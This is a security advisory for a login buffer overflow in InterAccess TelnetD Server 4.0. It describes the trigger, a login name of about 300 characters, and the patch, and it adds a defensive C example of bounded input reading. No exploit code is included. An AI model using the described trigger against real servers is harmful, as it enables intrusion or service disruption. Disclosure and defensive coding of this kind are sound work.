COMMAND
TelnetD Server
SYSTEMS AFFECTED
InterAccess TelnetD Server 4.0 for Windows NT
PROBLEM
UssrLabs found a local/remote buffer overflow. The code that
handles the login commands in the telnet session has an unchecked
buffer that will allow arbitrary code to be executed if it is
overflowed. Example:
[hellme@die-communitech.net$ telnet example.com
Trying example.com...
Connected to example.com.
Escape character is '^]'.
InterAccess TelnetD Server (30 Day Trial Version)
Release 4.0
Copyright (C) 1994-1999 by Pragma Systems, Inc.
All rights reserved.
This copy will expire on Tue Mar 21 21:55:14 2000
login name: (buffer)
Where (buffer) is approx. 300 characters. The exploit lags the
machine until it reaches 100% CPU time. The source of the exploit
was distributed as a MIME-encoded attachment (ex_telnd.zip).
SOLUTION
This was a BUILD 4 issue (which was released June 1998) and we
are now on BUILD 7. The problem can be fixed by updating the
service pack/WinSock or by updating to BUILD 7.
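Added example (not code from Pragma Systems or UssrLabs): a bounded
login-name reader in C showing the length check that the PROBLEM
section says is missing, enforced on the accumulated length so a name
split across several network reads is still caught. LOGIN_MAX, the
struct and the function names are assumptions made for illustration;
telnet option bytes are assumed to be stripped before this point.

```c
#include <stdio.h>
#include <string.h>

#define LOGIN_MAX 64  /* assumed limit; the page does not give the real buffer size */

enum login_status { LOGIN_OK, LOGIN_INCOMPLETE, LOGIN_TOO_LONG, LOGIN_BAD_CHAR };

struct login_reader {
    char   name[LOGIN_MAX + 1];  /* +1 for the terminating NUL */
    size_t len;                  /* bytes accepted so far, across all chunks */
};

void login_reader_init(struct login_reader *r) { memset(r, 0, sizeof *r); }

/* Feed one chunk as received from the socket. The bound is checked against
 * the running total, not the chunk size, before every single write. */
enum login_status login_reader_feed(struct login_reader *r,
                                    const unsigned char *buf, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        unsigned char c = buf[i];
        if (c == '\r' || c == '\n') {      /* end of the login line */
            r->name[r->len] = '\0';
            return LOGIN_OK;
        }
        if (c < 0x20 || c > 0x7e)          /* printable ASCII only */
            return LOGIN_BAD_CHAR;
        if (r->len >= LOGIN_MAX)           /* refuse instead of writing past name[] */
            return LOGIN_TOO_LONG;
        r->name[r->len++] = (char)c;
    }
    return LOGIN_INCOMPLETE;               /* caller reads more data and feeds again */
}

int main(void)
{
    unsigned char big[300];  /* constructed input, about 300 characters as in the advisory */
    struct login_reader r;
    memset(big, 'A', sizeof big);
    login_reader_init(&r);
    enum login_status st = login_reader_feed(&r, big, sizeof big);
    printf("300-byte name -> status %d, stored %zu bytes\n", (int)st, r.len);
    return 0;
}
```

On LOGIN_TOO_LONG or LOGIN_BAD_CHAR the caller should close the
session and log the source address rather than continue reading.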